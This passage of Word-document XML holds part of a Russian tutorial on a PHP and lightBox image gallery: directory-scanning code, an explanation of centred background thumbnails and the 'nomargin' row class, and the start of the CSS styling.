    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>$allowed_types=array('jpg','jpeg','gif','png'); //разрешеные типы изображений</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$file_parts=array();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$ext='';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>$title='';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>$i=0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>//пробуем открыть папку</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$dir_handle = @opendir($directory) or die(</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>There is an error with your image directory!</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>while ($file = readdir($dir_handle)) //</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>поиск</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>по</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>файлам</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>if($file=='.' || $file == '..') continue; //пропустить ссылки на другие папки</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>$file_parts = explode('.',$file); //разделить имя файла и поместить его в массив</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$ext = strtolower(array_pop($file_parts)); //</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>последний</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>элеменет</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>это</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>расширение</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$title = implode('.',$file_parts);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$title = htmlspecialchars($title);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$nomargin='';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>if(in_array($ext,$allowed_types))</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if(($i+1)%4==0) $nomargin='nomargin'; //</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>последнему</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>изображению</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>в</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ряде</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>присваевается</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> CSS </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>класс</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nomargin</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>echo '</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;div class=</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pic '.$nomargin.'</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> style=</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>background:url('.$directory.'/'.$file.') no-repeat 50% 50%;</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;a href=</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'.$directory.'/'.$file.'</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> title=</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'.$title.'</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> target=</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>_blank</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;'.$title.'&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;/div&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$i++;</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closedir($dir_handle); //</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>закрыть</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>папку</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Сканируя файлы папки и пропуская файлы не изображения, у нас накапливается XHTML код для каждого изображения. Код (линии 28-39) состоит из контейнера с классом pic (и в некоторых случаях nomargin). С помощью атрибута style мы устанавливаем фоновое изображение в виде нашего изображения. Мы позиционируем картинку в центре, используя 50% 50%. Таким образом изображение выравнивается как по горизонтали, так и по вертикали. Если изображение больше блока, мы видим только центральную его часть (ту часть, которая помещается в контейнер). Таким образом, у нас получаются красивые миниатюры (без необходимости уменьшение самого изображения).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Это хорошо работает с </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>нетяжелыми</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> изображениями.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В блоке находится ссылка, которая ведет к полноразмерному изображению. Название файла служит значением атрибута title. Плагин lightBox использует эти значения и преобразует картинки в галерею. Чтобы изменить описание изображения, необходимо его переименовать.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>У Вас может возникнуть вопрос по поводу класса nomargin! Для чего он нам нужен? У каждого изображения в галерее есть правый и нижний отступ. Это означает, что последний элемент в каждом ряду не сможет выравняться с правой частью заголовка блока. Это выглядит непрофессионально. Поэтому мы присваиваем специальный класс, который убирает правый отступ для последнего элемента в ряду. В итоге, мы получаем красивый результат.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CSS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Теперь давайте все немного оформим:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/* first reset some of the elements for browser compatibility */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>body,h1,h2,h3,p,td,quote,small,form,input,ul,li,ol,label{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>margin:0px;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>padding:0px;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>font-family:Arial, Helvetica, sans-serif;</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body{ /* body */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>margin-top:20px;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>color:white;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>font-size:13px;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>background-color:#222222;</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 xml:space="preserve">.clear{ /* clearfix </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>класс</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
